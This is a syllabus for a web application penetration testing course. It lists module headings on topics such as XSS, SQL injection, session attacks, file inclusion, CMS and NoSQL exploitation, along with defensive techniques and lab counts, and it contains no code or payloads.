Advanced Web Application Penetration Testing
I. Overview:
The Web Application Penetration Testing course advanced training course that provides all the advanced skills necessary to carry out a thorough and professional penetration test against modern web applications.
II. Duration:
39 hours
III. Objectives:
- Start from the very basics, all the way to advanced post-exploitation activities.
- Wide coverage of OWASP’s TOP 10
- Master Burp Suite
- In-depth Web application analysis, information gathering and enumeration
- XSS & SQL Injection
- Session related vulnerabilities
- LFI/RFI
- HTML5 attacks
- Pentesting Content Management Systems (CMS)
- Pentesting NoSQL databases and NoSQL-related APIs / NoSQL injections
- Start from Web Application Attacks and land to Network and Infrastructure Penetration Testing
- Gives you access to dedicated forums
- Makes you a proficient professional web application pentester
- After obtaining the eWPTv1 certification qualifies you for 40 CPE
IV. Intended Audience:
- Penetration Testers
- Web developers
- IT admins and staff
V. Prerequisites:
- Should attend Basic Penetration Testing Course
- Basic understanding of HTML, HTTP and JavaScript.
- Reading and understanding PHP code will help although it is not mandatory.
- No web development skills required.
VI. Course outlines:
1. Introduction to web applications
During this introductory module, the student will learn and understand the basics of web applications.
At the end of the module, the student will become familiar with tools such as Burp Suite and OWASP ZAP.
1.1. HTTP/S Protocol Basics
1.2. Encoding
1.3. Same Origin
1.4. Cookies
1.5. Sessions
1.6. Web Application Proxies
- Burp Suite
- OWASP ZAP
2. Information gathering
Every penetration test begins with the Information Gathering phase. This is where a pentester understands the application under a functional point of view and collects useful information for the following phases of the engagement. A multitude of techniques will be used to collect behavioral, functional, applicative, and infrastructural information.
The students will use a variety of tools to retrieve readily-available information from the target.
2.1. Gathering information on your target
2.2. Infrastructure
- Fingerprinting the web server
- Netcat
- WhatWeb
- Wappalyzer
- Web server modules
- Enumerating subdomains
- Netcraft
- Subbrute
- Dnsrecon
- TheHarvester
- Zone transfer
- Finding virtual hosts
2.3. Fingerprinting frameworks and applications
2.4. Fingerprinting custom applications
- Burp target crawler
- Creating a functional graph
- Mapping the attack surface
- Client side validation
- Database interaction
- Ile uploading and downloading
- Display of user-supplied data
- Redirections
- Access control and login-protected pages
- Error messages
- Charting
2.5. Enumerating resources
- Crawling the website
- Finding hidden files
- Back up and source code
- Enumerating users accounts
- Map
2.6. Relevant information through misconfigurations
- Directory listing
- Log and configuration files
- HTTP verbs and file upload
2.7. Google hacking
3. Cross-Site Scripting
In this module, the most widespread web application vulnerability will be dissected and studied in depth. At first, you are provided with a theoretical explanation—this understanding will help you in the exploitation and remediation process. Later, you will have the opportunity master all the techniques to find XSS vulnerabilities through black box testing.
3.1. Cross-Site Scripting
Basics
3.2. Anatomy of an XSS Exploitation
3.3. The three types of XSS
a. Reflected XSS
b. Persistent XSS
c. DOM-based XSS
3.4. Finding XSS
Finding XSS in PHP code
3.5. XSS Exploitation
a. XSS and Browsers
b. XSS Attacks
- Cookie Stealing through XSS
- Defacement
- XSS for advanced phishing attacks
- BeEF
3.6. Mitigation
Input Validation
- Context-Aware output encoding
- Never trust user input
4. SQL injection
This module will contain the most advanced techniques in finding and exploiting SQL injections, from the explanation of the most basic SQL injection up to the most advanced.
You will not just be able to dump remote databases but also get root on the remote machine through advanced SQL Injection techniques.
4.1. Introduction to SQL Injections
a. SQL Statements
b. SQL Queries inside web applications
c. Vulnerable dynamic queries
d. How dangerous is a SQL Injection
e. SQLi attacks classification
4.2. Finding SQL Injections
a. Simple SQL Injection scenario
b. SQL errors in web applications
c. Boolean-based detection
4.3. Exploiting In-band SQL Injections
a. First scenario
b. In-band attack challenges
c. Enumerating the number of fields in a query
- Different DBMS UNION mismatch errors
a. Blind enumeration
b. Identifying field types
c. Dumping the database content
4.4. Exploiting Error-based SQL Injections
a. MS SQL Server Error-based exploitation
b. The CAST Technique
c. Finding the DBMS version
d. Dumping the database data
e. Video – Error-based SQLi
f. MySQL Error-based SQLi
g. PostgreSQL Error-based SQLi
h. Developing Error-based SQLi Payloads
4.5. Exploiting blind SQLi
a. String extraction
b. Detecting the current user
c. Scripting blind SQLi data dump
d. Exploiting blind SQLi
e. Optimize blind SQLi
f. Time-based blind SQLi
4.6. SQLMap
a. Basic syntax
b. Extracting the database banner
d. cInformation Gathering
e. Extracting the Database
f. Extracting the Schema
g. Video – SQL Injection
h. Video – SQLMap
i. SQLMap Advanced Usage
j. Conclusions
4.7. Mitigation Strategies
a. Prepare statement
- Implementation
b. Type casting
c. Input validation
4.8. From SQLi to Server Takeover
a. Advanced MySQL Exploitation
- xp_cmdshell
- Internet Network Host Enumeration
- Port Scanning
- Reading the File System
- Uploading Files
- Storing Command Results into a Temporary Table
b. Advanced MySQL Exploitation
- Reading the File System
- Uploading Files
- Executing Shell Commands
c. Conclusions
5. Authentication and authorization
In this module, the student will learn the most common authentication mechanisms, their weaknesses and the related attacks: from inadequate password policies to weaknesses in the implementation of common features.
5.1. Introduction
a. Authentication vs. Authorization
b. Authentication factors
- Single-factor authentication
- Two-factor authentication
5.2. Common Vulnerabilities
a. Credentials over unencrypted channel
b. Inadequate password policy
- Dictionary attacks
- Brute force attacks
- Defending from inadequate password policy
- · Strong password policy
- · Storing hashes
- · Lockout/Blocking requests
c. User enumeration
- Via error messages
- Via website behavior
- Via timing attacks
- Taking advantage of user enumeration
d. Default or easily-guessable user accounts
e. The remember me functionality
- Cache browser method
- Cookie method
- Web storage method
- Best defensive techniques
f. Password reset feature
- Easily guessable answers
- Unlimited attempts
- Password reset link
g. Logout weaknesses
- Incorrect session destruction
- CAPTCHA
5.3. Bypassing Authorization
a. Insecure direct object references
- Best defensive techniques
b. Missing function level access control
c. Parameter modification
- Vulnerable web application
d. Incorrect redirection
- Redirect to protect contents
- Best defensive techniques
e. SessionID prediction
f. SQL Injections
j. Local file inclusion and path traversal
6. Session security
Session-related vulnerabilities, along with extensive coverage of the most common attacking patterns are the subject of this module.
Code samples on how to prevent session attacks are provided in PHP, Java and .NET. At the end of the module, the student will master offensive as well as defensive procedures related to session management within web applications.
6.1. Weaknesses of the session identifier
6.2. Session hijacking
a. Session Hijacking via XSS
- Exploit session hijacking via XSS
- Preventing session hijacking via XSS
- · PHP
- · Java
- · .NET
b. Session Hijacking via Packet Sniffing
c. Session Hijacking via access to the web server
6.3. Session Fixation
a. Attacks
- Set the SessionID
- Force the victim
- Vulnerable web application
b. Preventing Session Fixation
6.4. Cross-Site Request Forgeries
a. Finding CSRF
b. Exploiting CSRF
c. Preventing CSRF
7. Flash security and attacks
Flash, although a dying technology, is still present on millions of websites. Flash files can expose a web application and its users to a number of security risks, which are covered in this module. The student will first study the Flash security model and its pitfalls, and move on to using the most recent tools to find and exploit vulnerabilities in Flash files. After having studied this module, students will never look at SWF files the same way.
Flash Security and Attacks
7.1. Introduction
a. ActionScript
- Compiling and decompiling
b. Embedding Flash in HTML
- The allow Script Access attribute
c. Passing arguments to Flash files
- Direct reference
- Flash embedded in HTML
- FlashArgs attribute
7.2. Flash Security Model
a. Sandboxes
b. Stakeholders
- Administrative role
- User role
- Website role
- URL policy file
- Author role
c. Calling JavaScript from ActionScript
d. Calling ActionScript from JavaScript
e. Method NavigateToURL
f. Local shared object
7.3. Flash Vulnerabilities
a. Flash parameter injection
b. Fuzzing Flash with SWFInvestigator
c. Finding hardcoded sensitive information
7.4. Pentesting Flash Applications
a. Analyzing client-side components
b. Identifying communication protocol
c. Analyzing server-side components
8. HTML5
This module provides an extremely in-depth coverage of all the attack vectors and weaknesses introduced by drafted as well as finalized W3C new standards and protocols.
We will go through the most important elements of HTML5 and especially the new CORS paradigm that completely changes the way the SOP is applied to most modern web applications. By mastering this module in theory and practice, the student will possess an arsenal of penetration testing techniques that are still unknown to the vast majority of penetration testers.
A number of Hera labs are available to practice topics covered within this module. This module will also bring a penetration tester’s skills to the next level with next generation attack vectors that are going to affect web applications for the next decade.
HTML5
8.1. Cross-Origin Resource Sharing
a. Same Origin Policy issues
b. Cross-Domain Policy in Flash
c. Cross-Origin Resource Sharing
- Cross-Origin Ajax requests
- Requests
- · Simple request
- · Preflighted request
- · Request with credentials
- Access Control Headers
- · Access-Control-Allow-Origin
- · Access-Control-Allow-Credentials
- · Access-Control-Allow-Headers
- · Access-Control-Allow-Methods
- · Access-Control-Allow-Max-Age
- · Access-Control-Expose-Headers
- · Header origin
- · Access-Control-Request-Method
- · Access-Control-Request-Headers
8.2. Cross-Windows Messaging
a. Relationship between windows
b. Sending messages
c. Receiving messages
d. Security issues
- Cross-Domain XSS
8.3. Web Storage
a. Different storages
- Local storage
- Session storage
b. Local storage APIs
- Adding an item
- Retrieving an item
- Removing an item
- Removing all items
- SessionStorage APIs
- Security Issues
- Stealing local storage via JS
8.4. WebSocket
a. Real-time applications using HTTP
b. WebSocket – a new W3C standard
- Benefits
c. WebSocket API
d. Security Issues
8.5. Sandboxed frames
a. Security issues before HTML5
- Redirection
- Accessing the parent document from iframe
b. HTML5 sandbox attribute
9. File and Resource attacks
During this module, the student will practice a number of vulnerabilities that affect web application files and resources.
The student will learn how to identify and exploit path traversal, file inclusion and unrestricted file upload vulnerabilities.
File and Resource Attacks
9.1. Path Traversal
a. Path conversion
b. Encoding
c. Best defensive techniques
9.2. File Inclusion Vulnerabilities
a.Local File Inclusion (LFI)
b. Remote File Inclusion (RFI)
9.3. Unrestricted File Upload
a. Vulnerable web application
- The attack
b. Best defensive techniques
- Filtering based on file content
10. Other attacks and Vulnerabilities
During this module, the student will practice a number of vulnerabilities that, despite being less known or publicized, are still affecting a number of web applications across many different programming languages and platforms.
Advanced clickjacking attacks are covered in depth with real-world examples and dissected real-world attacks.
The level of depth and the amount of practical sessions during this module will provide even seasoned penetration testers with new ways to break the security of their targets
10.1. Clickjacking
a. Understanding Clickjacking
b. Feasibility study
c. Case 1: Clickjacking is possible
- Case 2: Clickjacking is not possible
d. Building of a malicious web page
e. Spreading the malicious link
f. Waiting for the victim click
g. Best defensive techniques
- The old school
- Using HTTP header X-Frame-Options
h. Likejacking in Facebook
i. Cursorjacking
10.2. HTTP Response Splitting
a. Typical vulnerable scenario
b. XSS through HTTP response splitting
c. Bypassing Same Origin Policy
- Attack explained
- Best defensive techniques
- Defense in PHP
10.3. Business Logic Flow
a. Vulnerable web application
b. Best defensive techniques
10.4. Denial of Services
a. Different DoS attacks
- DoS due to huge number of requests
- DoS due to greedy pages
b. Best defensive techniques
10. Web services
Professional penetration testers should master all aspects related to web services testing.
Web services nowadays are the data and logic provider for a variety of thin and thick clients, from web application clients to mobile applications.
During this highly in-depth module, the student will first become familiar with web services paradigms and protocols and then learn all the most important related security issues.
WSDL and SOAP testing will be covered not only in theory but also in practice in our Hera Lab.
11. Web Services
11.1. Introduction
11.2. Web Services Implementations
a. XML-RPC
b. JSON-RPC
c. SOAP
d. RESTful
11.3. The WSDL Language
a. Interaction between client and server
b. Objects in the WSDL
- Binding
- PortType
- Operation
- Interface
- Message
c. SOAP in action
d. Further reading
11.4. Attacks
a. WSDL Disclosure
- Google hacking
- Discovering WSDL files
- Public Web Services
b. WSDL Scanning
- Attack in action
c. SOAPAction Spoofing
- Prerequisites for the attack
- Attack in action
- Best defensive techniques
d. SQLi through SOAP messages
- Best defensive techniques
13. Xpath injection
XPath is the XML standard that allows web applications to query XML databases.
In this module, the student will learn advanced XPath injection techniques, in theory and practice in Hera lab.
12.1. XPath Injection
12.2. XML Documents and Databases
12.3. XPath
- XPath expression and syntax
- XPath vs. SQL
12.4. Detecting XPath Injection
a. Error-based injection
b. Blind injection
- Detect true condition
- Detect false condition
c. Exploitation
- Bypass XPath query
- Extracting the XML document structure
- Finding out the root node
- Finding the first child node name
- Finding the content of a node
12.5. Best Defensive Techniques
13. Penetration testing content management systems
This module covers the whole range of penetration testing activities against CMS, from information gathering, enumeration and brute force attacks, to host exploitation through vulnerable plugins and lateral movement through credential reuse. More specifically, the student will get accustomed to identifying vulnerabilities like XSS, SQLi, RCE, SOME and CSRF on WordPress and Joomla CMS, as well as chaining various vulnerabilities for maximum exploitation.
14. Penetration Testing Content Management Systems
14.1. Introduction
14.2. WordPress
a. Information Gathering
- WPScan
- Plecost
- Nmap NSE Scripts
- Directory Indexing/Listing
b. Exploitation
- Bruteforce Attacks
- · Bruteforce with WPScan
- · Bruteforce with wpbf
- Attacking Plugins
- · From XSS to RCE
- · Malicious Plugins for Post-Exploitation & Persistence
- · Joomla
c. Information Gathering
- Joomscan
- Joomla Scan
- Extensions
- Content Discovery
Exploitation
- Bruteforce Attacks
- Vulnerabilities in Joomla Core
14. Penetration Testing NoSQL Databases
In this module, the student will learn how to manually identify and exploit vulnerabilities in NoSQL databases or NoSQL-powered web applications, as well as execute elaborate attacks against exposed NoSQL-related APIs. Transitioning from a compromised NoSQL database to full host exploitation, as well as effective data exfiltration methods are also covered in this module.
15. Penetration Testing NoSQL Databases
15.1. Introduction
a. Pentesting NoSQL Databases Methodology
15.2. NoSQL Fundamentals & Security
a. MongoDB
- MongoDB Fundamentals
- MongoDB Security
- MongoDB Penetration Testing Tools
b. CouchDB
- CouchDB Fundamentals
- CouchDB Security
- CouchDB Exploitation Examples
c. Elasticsearch
- Elasticsearch Fundamentals
- Elasticsearch Security
d. Memcached
- Memcached Fundamentals
- Memcached Security
- Memcached Exploitation Example
e. Redis
- Redis Fundamentals
- Redis Security
15.3. NoSQL Exploitation
a. NoSQL Injections
b. NoSQL Injection Categories
- PHP Tautology Injections
- NoSQL Union Query Injection
- NoSQL JavaScript Injection
- Piggybacked Queries
- · Real-Life Piggybacked Query Attack
- Cross-Origin Violations
- · Real-Life Cross-Origin Exploitation Against MongoDB
- NoSQL Injection in MEAN Stack Applications
- · NoSQL Injection in MEAN Stack Applications – Example 1
- · NoSQL Injection in MEAN Stack Applications – Example 2
- · NoSQL Injection in MEAN Stack Applications – Example 3
- · NoSQL Injection in MEAN Stack Applications – Example 4
- · NoSQL Injection in MEAN Stack Applications – Example 5
VII. LABS
The WAPT course is a practice-based curriculum. Being integrated with Hera Lab, the most sophisticated virtual lab on IT Security, it offers an unmatched practical learning experience. Hera is the only virtual lab that provides fully isolated per-student access to each of the real world network scenarios available on the platform. Students can access Hera Lab from anywhere through VPN.
- Lab 1 Introduction - 2 Challenging Labs
- Lab 2 Information Gathering - 2 Challenging Labs
- Lab 3 Cross Site Scripting - 7 Challenging Labs
- Lab 4 SQL Injection - 10 Challenging Labs
- Lab 5 Authentication and Authorization - 14 Challenging Labs
- Lab 6 Session Security - 9 Challenging Labs
- Lab 7 Flash Security - 1 Challenging Lab
- Lab 8 HTML5 - 4 Challenging Labs
- Lab 9 File and Resources Attacks - 4 Challenging Labs
- Lab 10 Other Attacks - 1 Challenging Lab
- Lab 11 Web Services - 4 Challenging Labs
- Lab 12 XPath - 5 Challenging Labs
- Lab 13 Exploiting Wordpress - 5 Challenging Labs
- Lab 14 From Static Analysis to WordPress Exploitation - 1 Challenging Lab
- Lab 15 Chaining Vulnerabilities To Remotely Extract WP Admin Credentials - 1 Challenging Lab
- Lab 16 Redis Exploitation - 3 Challenging Labs
- Lab 17 NoSQL Injections Against MongoDB - 4 Challenings Labs
- Lab 18 CouchDB Exploitation - 2 Challenging Labs
Online
At Ho Chi Minh City
At Ha Noi